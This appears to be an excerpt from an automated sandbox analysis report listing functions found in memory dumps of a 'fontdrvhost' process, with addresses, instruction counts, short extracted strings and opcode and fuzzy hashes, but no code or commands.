                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9b28a44d14c23b5b8c8d4cc29608b605f119cb6621a96d23c971fb90ea208684
                                                                                                                    • Instruction ID: 1249d3f547a784178b25b36bbd9e131ef276a7f341a9e8fb41a9c6df6696d544
                                                                                                                    • Opcode Fuzzy Hash: 9b28a44d14c23b5b8c8d4cc29608b605f119cb6621a96d23c971fb90ea208684
                                                                                                                    • Instruction Fuzzy Hash: 67E01A2294E7C08FC74B9B3488B99557FA0DE1721174A40EAC145CF5A3EA1D8849C702
                                                                                                                    Function 00007FFD3459A730 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Function 00007FFD3459DB19 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 38dd33352cd2da05a2d947a07dc06f6245a8e0b2ec56bb027e340bdf51e876af
                                                                                                                    • Instruction ID: 4a6833d773f23534c5084bd77748d04f2566d3450c56826d465175971905811f
                                                                                                                    • Opcode Fuzzy Hash: 38dd33352cd2da05a2d947a07dc06f6245a8e0b2ec56bb027e340bdf51e876af
                                                                                                                    • Instruction Fuzzy Hash: C5E01A2294E7C04FC74B973588A98453FB09E2721174A40EBC145CF1A3DA1D8849C702
                                                                                                                    Function 00007FFD34560B95 Relevance: .0, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1655bf586bd510a0444da9578f040976055379fdba1b0be01a33af2343bf41be
                                                                                                                    • Instruction ID: 97261e78cb310111d530b83f7af1a2dd14e57a6d62dddd683722aa4715897ae2
                                                                                                                    • Opcode Fuzzy Hash: 1655bf586bd510a0444da9578f040976055379fdba1b0be01a33af2343bf41be
                                                                                                                    • Instruction Fuzzy Hash: ABD0A73066954A4FDA01B73CC8898547BA0EB0F224BD510F1D009C7561D50D4C558B00
                                                                                                                    Function 00007FFD34591FA0 Relevance: .0, Instructions: 18COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                    Function 00007FFD345970C0 Relevance: .0, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 31d8b962ad8697e016be0419b8b3746812643610956d0d679795cb27cfcbcbb5
                                                                                                                    • Instruction ID: f5ca09311e8789320849b0786d40d137b301b974e371f541c62c5882e0a52137
                                                                                                                    • Opcode Fuzzy Hash: 31d8b962ad8697e016be0419b8b3746812643610956d0d679795cb27cfcbcbb5
                                                                                                                    • Instruction Fuzzy Hash: 7FD01234B509044F871CA63888A987473A1EB6A21679550A9D00ACB3B1EA6ADC89C741
                                                                                                                    Function 00007FFD3459B9E0 Relevance: .0, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 11f0e614b61dd8402b1f6cef3bf42be3e8dbf3004db8f484bdd3684dcb90d91b
                                                                                                                    • Instruction ID: 1a367c1b0016e4e05edaa1a4954a86f81f7ea367d6dee60520e35c18205a4a80
                                                                                                                    • Opcode Fuzzy Hash: 11f0e614b61dd8402b1f6cef3bf42be3e8dbf3004db8f484bdd3684dcb90d91b
                                                                                                                    • Instruction Fuzzy Hash: 3DD01234B619044F871CAA3888A987473A1EB6A21679540A9D40AC72B1DE6ADC89DB41
                                                                                                                    Function 00007FFD34560CBF Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 623355c4c761995da0b65237a2ec80d23bbe5063140a0c10700039931d7a4e64
                                                                                                                    • Instruction ID: 742d2502906de8fc2a2c6c1b05cb9bbd5b5e2fb4d8f3e1f54805611e23c2c237
                                                                                                                    • Opcode Fuzzy Hash: 623355c4c761995da0b65237a2ec80d23bbe5063140a0c10700039931d7a4e64
                                                                                                                    • Instruction Fuzzy Hash: C9E01735F0960ACBFB01EB54C4D46AEB7A1EB52721F1082B5C501C7289DB7CA684EA80
                                                                                                                    Function 00007FFD345606A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                                                                                                    • Instruction ID: de2ea020ad61640ef8e40a0b67cdc873ade2ef5fac3099df56b1d3f84cd23727
                                                                                                                    • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                                                                                                    • Instruction Fuzzy Hash: BFC04C06F5E51F01B417B56E54E60ACB2415BD7A70FD52172D70CD10C19D8D20D5A156
                                                                                                                    Function 00007FFD345612E0 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction ID: a50990506d9201a2f15d54500c1484066e0405552ff1ffe2eb2556d764c299cd
                                                                                                                    • Opcode Fuzzy Hash: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction Fuzzy Hash: 88C04C34A518098FCA48EB69C89591477A0FB1A215BD61190E409C7271E65DDCD5D741
                                                                                                                    Function 00007FFD345659C7 Relevance: .0, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b879461ba45081c13b252f2cda251c3792a7d18d45fbd4d9e80ef62ea85ac5d6
                                                                                                                    • Instruction ID: 7ef22ee12f0d9d04a2c6fd74adfa2b236bb7839dcdc839e5105e391e8ba6fee9
                                                                                                                    • Opcode Fuzzy Hash: b879461ba45081c13b252f2cda251c3792a7d18d45fbd4d9e80ef62ea85ac5d6
                                                                                                                    • Instruction Fuzzy Hash: 07C08C01F0C81702F12A238840312BD84426B40304F8000B4E00DDA2C6CE1C9F0243C6
                                                                                                                    Function 00007FFD345606C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction ID: b3c5cdccc0aa1ee8565224c2d76708e0fed1863bf9f8249f2238a3161b01cd25
                                                                                                                    • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction Fuzzy Hash: 88B01200D6640F00A40A357A08D20A470405B46120FC02070D60CC1081988D10942242

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD34570622 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: L_^$$L_^%$L_^1$L_^9$L_^:$^+=$#<L
                                                                                                                    • API String ID: 0-4271824446
                                                                                                                    • Opcode ID: b34310fa1fc0c123ab2ee53f33e57d96bf9007b256c182c9725413568574c979
                                                                                                                    • Instruction ID: 362b89c93282e4a0fc2b586642626d1c8581a31cd0c0734f6ce42700a835332e
                                                                                                                    • Opcode Fuzzy Hash: b34310fa1fc0c123ab2ee53f33e57d96bf9007b256c182c9725413568574c979
                                                                                                                    • Instruction Fuzzy Hash: C571E917B0C5222AD92977ED78620FF7748DF91379B184677E28CA90A34D18F8C245D6
                                                                                                                    Function 00007FFD345706D3 Relevance: 9.0, Strings: 7, Instructions: 225COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: L_^$$L_^%$L_^1$L_^9$L_^:$^+=$#<L
                                                                                                                    • API String ID: 0-4271824446
                                                                                                                    • Opcode ID: 230673a9c5e27a90f079f00ef638b592d3d03742240a7f1810d7f83d4348c3ca
                                                                                                                    • Instruction ID: d77be82bacd0cfb6302ea27809dde9b24e51198c4de67680d41ce0311e0b4110
                                                                                                                    • Opcode Fuzzy Hash: 230673a9c5e27a90f079f00ef638b592d3d03742240a7f1810d7f83d4348c3ca
                                                                                                                    • Instruction Fuzzy Hash: 73517557F0C52626E92937EC38A60FF6748DFA1379B189677E24DA80A34D1CECC241D9
                                                                                                                    Function 00007FFD345706FA Relevance: 9.0, Strings: 7, Instructions: 215COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: =L_^$L_^+$L_^1$L_^9$L_^:$^+=$#<L
                                                                                                                    • API String ID: 0-1802454848
                                                                                                                    • Opcode ID: 915d380f74688abbd3bd571c83459c687468c841d5a0e5921064095303701577
                                                                                                                    • Instruction ID: 8e5d385fb794a36892cc1e09d1c1497468d0cf48f766087935c672a262fa8820
                                                                                                                    • Opcode Fuzzy Hash: 915d380f74688abbd3bd571c83459c687468c841d5a0e5921064095303701577
                                                                                                                    • Instruction Fuzzy Hash: 9D516D17B0C52626E92937FD38A60FF6708DFA1379B089677E20DA80A34D1CEC8241D9
                                                                                                                    Function 00007FFD345609B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                                    • API String ID: 0-1692736845
                                                                                                                    • Opcode ID: 9bc2b293896c0baef41746b4921a91980c9f281a934a55c9448ee0fb6a910f5c
                                                                                                                    • Instruction ID: 7f7c9cd1ebcbb4773652999d575a23293d0b24c1fb6050a7d2b30b96cbfc5eb1
                                                                                                                    • Opcode Fuzzy Hash: 9bc2b293896c0baef41746b4921a91980c9f281a934a55c9448ee0fb6a910f5c
                                                                                                                    • Instruction Fuzzy Hash: BE419407F1D46B67EA2A37FD74611FE6B889FA2375B084377E14C990E34D0CA88582E5

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD34570D48 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5X_H
                                                                                                                    • API String ID: 0-3241812158
                                                                                                                    • Opcode ID: 3a8d254df2c218f40cc745fd2fd519ec446ce73473658a7121c8cb2a841c3e51
                                                                                                                    • Instruction ID: 0ca94b07fed3ee1fa7cc180c651c3564e5f0520ed56c61196f40ba802fd38632
                                                                                                                    • Opcode Fuzzy Hash: 3a8d254df2c218f40cc745fd2fd519ec446ce73473658a7121c8cb2a841c3e51
                                                                                                                    • Instruction Fuzzy Hash: 19910172A0CA8A8FE799DB6888757A97FE1FB57350F4041BAD009D72E2CA7C6815C710
                                                                                                                    Function 00007FFD345A12B1 Relevance: .5, Instructions: 475COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 694d2eadcde64b09802593860702108fd4c51f770cb1a588041f6df296fd81e4
                                                                                                                    • Instruction ID: 28ea7a543e3547f8b102ea0c84606085b7983cb895fa4b23efac63623b6bb226
                                                                                                                    • Opcode Fuzzy Hash: 694d2eadcde64b09802593860702108fd4c51f770cb1a588041f6df296fd81e4
                                                                                                                    • Instruction Fuzzy Hash: 71C19C35E2E65A0BE32F592808A21B57791EB93205B2D837DCEDBC75C7DC1C680782C1
                                                                                                                    Function 00007FFD345A12E5 Relevance: .3, Instructions: 327COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c70f1c51156b47ad59345075d04edfc8d4b61a3564eb2a54db368e85e0a7b23b
                                                                                                                    • Instruction ID: b71651af9b2e314990e3405f1665071df93ef86fc223a2b892c062dec72361f8
                                                                                                                    • Opcode Fuzzy Hash: c70f1c51156b47ad59345075d04edfc8d4b61a3564eb2a54db368e85e0a7b23b
                                                                                                                    • Instruction Fuzzy Hash: AF813672E6E66A07A36E48284CA21767285EB83215B29527ECFDBC35C3EC0D6C1351C2
                                                                                                                    Function 00007FFD34570E43 Relevance: .2, Instructions: 173COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d97ec433e5bed5c5ce24c2feb0350b740c9d2fb5ba4d7f00c2d1c02295bd9c74
                                                                                                                    • Instruction ID: 7f658d874e3368eda5c707a6c747ebb5a24d36d4d95cd27106b1c4753b5df4f5
                                                                                                                    • Opcode Fuzzy Hash: d97ec433e5bed5c5ce24c2feb0350b740c9d2fb5ba4d7f00c2d1c02295bd9c74
                                                                                                                    • Instruction Fuzzy Hash: 78511F72A1CA4A8FE398DB5CC8A57A97FE1FB96360F40017AD009E73D5CBB91411C700
                                                                                                                    Function 00007FFD34580CFC Relevance: 8.4, Strings: 6, Instructions: 944COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: *a4$HIb4$PXb4$P\b4$pqb4$wb4
                                                                                                                    • API String ID: 0-1030217466
                                                                                                                    • Opcode ID: 7119bbf3c5770836344e064367f0a8fd2c0381893af28dab60711f261544a979
                                                                                                                    • Instruction ID: 76038e56eac96d0905bcf193a404f973610e51087f59c0d257ffdfe07a84e029
                                                                                                                    • Opcode Fuzzy Hash: 7119bbf3c5770836344e064367f0a8fd2c0381893af28dab60711f261544a979
                                                                                                                    • Instruction Fuzzy Hash: 3862B021F1CA1A4FEB99EB1888E66B877D2FF95744F4441BAD10ED3286DD2CBC429740
                                                                                                                    Function 00007FFD34581305 Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P\b4$wb4
                                                                                                                    • API String ID: 0-1169014964
                                                                                                                    • Opcode ID: d05d504df4c70b2bcffe8e62a0b7a7d1d00aec2aa0d5657d6f1872daec154a55
                                                                                                                    • Instruction ID: 04047b01daa643e20217dc0c92000a4bc6091103bd8695854b0fb2e86aeb73bf
                                                                                                                    • Opcode Fuzzy Hash: d05d504df4c70b2bcffe8e62a0b7a7d1d00aec2aa0d5657d6f1872daec154a55
                                                                                                                    • Instruction Fuzzy Hash: 0B917F31F1C94A4FEB99EB2894F26B877A1FF95304B5445B9D04ED3286DE2CAC428B40
                                                                                                                    Function 00007FFD345A35F5 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @aE4
                                                                                                                    • API String ID: 0-1610574275
                                                                                                                    • Opcode ID: 5f43bc50037a1f7b7631e6e952f92f8ec3317561d8c9de268ec3562e9da2465f
                                                                                                                    • Instruction ID: e7c89b0b2b73a9aa00b089ec7b94bb043cac811dd1d09a900baeca1cbea86abb
                                                                                                                    • Opcode Fuzzy Hash: 5f43bc50037a1f7b7631e6e952f92f8ec3317561d8c9de268ec3562e9da2465f
                                                                                                                    • Instruction Fuzzy Hash: 0491B221F1D94A0FEBDEEB1884B62B573D1EBA6358F04407AD94EC32C7DD2CA8459381
                                                                                                                    Function 00007FFD34570998 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 87b4
                                                                                                                    • API String ID: 0-1132462551
                                                                                                                    • Opcode ID: 1b9e81b02a5f737ff0a56993d622b480da2e7f9933feab22686a1f2e0792812e
                                                                                                                    • Instruction ID: 1075875f35212c2aad7d0b610feb2de77eada48d7a3a8797d45a9d3b3bab8d26
                                                                                                                    • Opcode Fuzzy Hash: 1b9e81b02a5f737ff0a56993d622b480da2e7f9933feab22686a1f2e0792812e
                                                                                                                    • Instruction Fuzzy Hash: 1621F821F1C9190FF758FB6C84AAA7577D6EB99325B5040B9E40EC32E7DD2CEC418281
                                                                                                                    Function 00007FFD345A1EF9 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: caec905013c34235ab15f3c7ddfec50e83176b344827737a1c9c8424fca9d588
                                                                                                                    • Instruction ID: c4afec0719a40c2429a2779e23769a1417b9e272f10d40bbbf3f3f0905bdde68
                                                                                                                    • Opcode Fuzzy Hash: caec905013c34235ab15f3c7ddfec50e83176b344827737a1c9c8424fca9d588
                                                                                                                    • Instruction Fuzzy Hash: BEF06D61A0E3C04FCB16EA348869455BFA0EF6721174A51EFC046CF1A3EA2D8889C701
                                                                                                                    Function 00007FFD34583F09 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 6327e0fbbd3d2abe1d90331d178e201640695889aac6d57857d0f2d1a8ff80fe
                                                                                                                    • Instruction ID: 9b5879d5b4d52f8cb37b748679800b3f5b8ea0101d88c17824db5fe6e392c694
                                                                                                                    • Opcode Fuzzy Hash: 6327e0fbbd3d2abe1d90331d178e201640695889aac6d57857d0f2d1a8ff80fe
                                                                                                                    • Instruction Fuzzy Hash: FBE06571A0E7C04FC756A73488684547FA0EF6720174A41EEC145CF1A3DA2D8885CB01
                                                                                                                    Function 00007FFD345A3129 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 7f8583f64fc22b8d8b91bb3e5795d03e8c76d4c2486fc8bef69233033c9f46ae
                                                                                                                    • Instruction ID: 75f0ff9b178f389f05860dee1172146101dcafabf1e3675727e6cf9d5a5837ee
                                                                                                                    • Opcode Fuzzy Hash: 7f8583f64fc22b8d8b91bb3e5795d03e8c76d4c2486fc8bef69233033c9f46ae
                                                                                                                    • Instruction Fuzzy Hash: 59E06D71A4E7C44FC75AEA34886D454BFA0EF6721174A42EFC545CF1A3EA2D8885CB01
